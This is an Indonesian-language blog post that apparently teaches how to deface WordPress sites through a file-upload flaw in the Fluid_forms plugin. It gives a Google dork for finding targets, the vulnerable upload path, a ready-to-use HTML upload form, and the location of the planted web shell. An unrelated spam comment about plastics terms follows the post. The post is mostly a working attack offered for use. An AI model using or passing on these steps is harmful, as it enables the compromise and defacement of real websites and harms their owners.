Header Ads

Defece Menggunakan WordPress deface Fluid_forms Upload Vulnerability Exploit


#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/" 

Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/

CSRF , simpan dengan ext .html ya 


 <form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

kalau vuln nanti akan keluar [] 

Akses shelmu : /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php 


Semoga bermanfaat

1 comment:

  1. COMPRESSION RATIO– In an extruder screw, the ratio of quantity available top rated bidets in the first flight on the hopper to the final flight on the end of the screw. CLAMPING PLATE– A plate fitted to a mould and used to fasten mould to a molding machine. CHALKING– Dry chalk-like look or deposit on the surface of a plastic.

    ReplyDelete

Powered by Blogger.